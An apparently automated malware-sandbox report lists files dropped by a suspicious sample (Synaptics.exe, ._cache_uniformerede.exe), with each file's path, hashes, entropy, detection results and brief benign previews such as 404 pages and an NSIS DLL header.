                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 colors
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                          Entropy (8bit):4.355890074651617
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:G8IhVsAOVS+3P7sZqt8+7tCSWhlTB/ryOLkTJNzyyyyyyyUH/seOY8k9H09kI27:SJOVhzU0tBOVTyOLsfFWeUH27
                                                                                                                                                                                                                          MD5:076675FE01F793F7DFFE82D24F4E806A
                                                                                                                                                                                                                          SHA1:2E2E04D353C34A60E3B5CCBE0C3D120FE719B656
                                                                                                                                                                                                                          SHA-256:CB54C21B707D3879D091A49D459B1BE287B922952286B55EF1DFB7249C21A93C
                                                                                                                                                                                                                          SHA-512:B8720EA4D858777C91ED355C6D3C04B7DCF3A8318A044400A1C1FF10A06FA91E2A8446B900E910D41CDE9FCDB64FDDEF5F4BAD3FFAEE1CDA3D27457EF849DD0C
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:...... .............(... ...@..... ................................................f...................................................................................f............................................hfc.........................................................................hfc........................................L...................................................................................................L............................MLK.........................................................................................MLK.................................fec.........................................................................................fec.................................gge.........................................................................................gge.................................ihg..............|..........................................................................ihg.................................jii..........{............

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iivijlnh.tvc.psm1

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:U:U
                                                                                                                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:1

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lqiaigga.n0f.ps1

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:U:U
                                                                                                                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:1

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sqjqhruh.5xf.psm1

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:U:U
                                                                                                                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:1

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tfhs1qp5.1e4.ps1

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:U:U
                                                                                                                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:1

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\cacert.pem

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\._cache_uniformerede.exe
                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1245
                                                                                                                                                                                                                          Entropy (8bit):5.462849750105637
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
                                                                                                                                                                                                                          MD5:5343C1A8B203C162A3BF3870D9F50FD4
                                                                                                                                                                                                                          SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
                                                                                                                                                                                                                          SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
                                                                                                                                                                                                                          SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\gDI1ITp.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.2538488495012965
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0jfuHSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+fH+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:4C48E0B87A4974DA3DE8457A715269D3
                                                                                                                                                                                                                          SHA1:DDB4D66024C5BA01BC25E48D0395C8B41A2682EF
                                                                                                                                                                                                                          SHA-256:23C673444C8F195FEB25442859855FA082B349C9AC651D869131BFD6FE901964
                                                                                                                                                                                                                          SHA-512:9BDD4325033BF6C4ECC3E3AA23997A8AF96E011335661BB6FB352FCEF25A0449D51ED510669A71C8ED1D5179717C721490F0913AB6141BFCDBA37DCF0B82877D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9rowmsU0DcTwrnBwJYGhWA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\hbqA6yu.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.241966032718902
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0cGvXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+o+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:4B9B6FD7A34D94AD24A87D76D3FDD2C3
                                                                                                                                                                                                                          SHA1:8141F00B616B6CA841ED57D82EB1EB0B7613A12C
                                                                                                                                                                                                                          SHA-256:D21DBDEECCD85A7EB3C3BA85F8DF0D45902787F488BF1270B19A6853F6D5F13F
                                                                                                                                                                                                                          SHA-512:89C0DE2A01F887724788F26237FD423907CB4042E25F5CF2D5AC1383CA34EE4EDAC18F66976B35B93D82E056C59D843047A4AA4FD05A8436298A94E8E5E9C583
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dsA2arxck7u2U5qhAr4E-w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\is9f5lp.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.2761258398996995
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0wwDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+OD+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:176F1492E63CC1F711735979D8A32171
                                                                                                                                                                                                                          SHA1:035F7B4A86A3DD76CDAD7A682040F69997FA44F1
                                                                                                                                                                                                                          SHA-256:5CB68617B56B399933755F09D64E5B3032E98F018FEDDADC0C5881C44A5861EE
                                                                                                                                                                                                                          SHA-512:D93CAA484C432D2FC67EACB34FDCA9C7E2412D30F7A32C66F35699D7DD649E66CD85A2E26B5AC88B9B6467447202E912D74DC4C01B060DA1D975F4D7D093D273
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="X3IGjGNMuI5AT021HdRqHQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\kKBEMnN.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.247285736491689
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0pSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+6+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:34E8A34A8823300FE9E6C2D1ECB4625C
                                                                                                                                                                                                                          SHA1:EF1DF33551C1F46F8E2EAAC6399B96857EC3DE23
                                                                                                                                                                                                                          SHA-256:E0B88938C54900BB7A6AF22DA6A9862D79C04560566DCBC875A54EB5E8C4A847
                                                                                                                                                                                                                          SHA-512:6934B3469C18C029F880181B3F9B8647F68C510ADE9AC29D80C081FA155D3F4BF13DDBF6097D2355ECE93BDB7968B64A6ED48091588505BF2C538A7144871B5A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="df4llUM1_a5yRnvczvu9sA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\nnXaK8k.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.2706656883077185
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0XKq+3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+X+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:03C4197A74BD1FF6F45FB95D05FCA272
                                                                                                                                                                                                                          SHA1:2988F1E5E719189717A4C3C570F7A51E5ADBB493
                                                                                                                                                                                                                          SHA-256:EE86F8E80C639AE711C59ADB3AD51C3C6CBF4A7AD6CE97F79D405198678F5809
                                                                                                                                                                                                                          SHA-512:9EFFB84272D34E842A09B2A26E3940D08A4C925C45934F3112DB13A92075B22F0A3AD315A48DF291CBE3AA4AC718F9B385144396540873C8F2446EEC347FE800
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FbcWRuaiKHhu9Uf8QMKCOQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\._cache_uniformerede.exe
                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):12288
                                                                                                                                                                                                                          Entropy (8bit):5.814115788739565
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                                                                                                                                                          MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                                                                                                                                                          SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                                                                                                                                                                          SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                                                                                                                                                                          SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.W32.AIDetect.malware2.20966.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.W32.AIDetect.malware2.20966.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.generic.ml.22865.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.generic.ml.22865.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.7115.16481.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: SCAN Swift 054545676700000000000000001.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: SCAN Swift 054545676700000000000000001.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: PO64747835 PDF.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Exploit.Rtf.Obfuscated.64.25308.rtf, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.generic.ml.10062.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.generic.ml.10062.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: ALuh1ODGq3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.W32.AIDetect.malware2.14840.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.W32.AIDetect.malware2.14840.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: pago.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: pago.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\olE9oXI.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.264099888586555
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0zDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+kD+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:1777D1776247C1C150D1386480A52D5F
                                                                                                                                                                                                                          SHA1:0A6B244BCD6F0C091C3702956E626F102EA0ECB5
                                                                                                                                                                                                                          SHA-256:6758A377D86B503565A8E871C887D7AD9401E05677514C422913B0C6C2463182
                                                                                                                                                                                                                          SHA-512:932E56AA1501AE8A1A669F2446490C0A11942FED49CC775B924BB989061090D5DE6F311CBA2AAA94419BF5F64242C1E45BFFF091817F7EE8680EB8ECE55A2D5B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cMw69lcQftZBEgjRqwMv0Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\open-menu-symbolic.symbolic.png

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\._cache_uniformerede.exe
                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                          Size (bytes):106
                                                                                                                                                                                                                          Entropy (8bit):5.091457983029907
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:yionv//thPl9vt3lAnsrtxBllNM9NlysfLsQmv//lH1p:6v/lhPysH8Nlysfmv/Tp
                                                                                                                                                                                                                          MD5:89B8C9C7F53554F3C57C1BF4881BC0CA
                                                                                                                                                                                                                          SHA1:D3231B624F8C2DD2A569F0B87BD58162412CF5C8
                                                                                                                                                                                                                          SHA-256:E5BDA8AF2A41C34F47054318E16508C53718ED641D1404F7C33E1DD1E6142184
                                                                                                                                                                                                                          SHA-512:D6CBAF433E3EB9680854C381756FC91A97464D614B9A03E3787389901301433AF243D7A183A06CBE6E9DE1CBA2E7E882D6EE5D94AA300872C3B5B684A3DA399B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sBIT....|.d....!IDAT8.c`.h........Z...`4...F..........N......IEND.B`.

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\p3Ti5MN.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.272581421592352
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0X7jSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+S7j+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:B6FB539BCAB3116CEA69C000B9D74B91
                                                                                                                                                                                                                          SHA1:91DCBEA37B11FE5EE1CA774848DD144AA19B6FA1
                                                                                                                                                                                                                          SHA-256:94CC356127E3401D9F37DDC60770E6B051802B1D0EB7EAF292A03C5D7EE24DAC
                                                                                                                                                                                                                          SHA-512:C4F7C6C5EB5D21533174C9BD5182F233E2C060D463139C22E7B58E0755EA92D680420ACBDAE717BE742AA9429FB9D0C91BF14EEA85B1CFD893A78610B89EC1CC
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="V6uQV_DFuTz69vnKPOKoRg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\sGgz8WE.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.2606686072324695
                                                                                                                                                                                                                          Encrypted:false
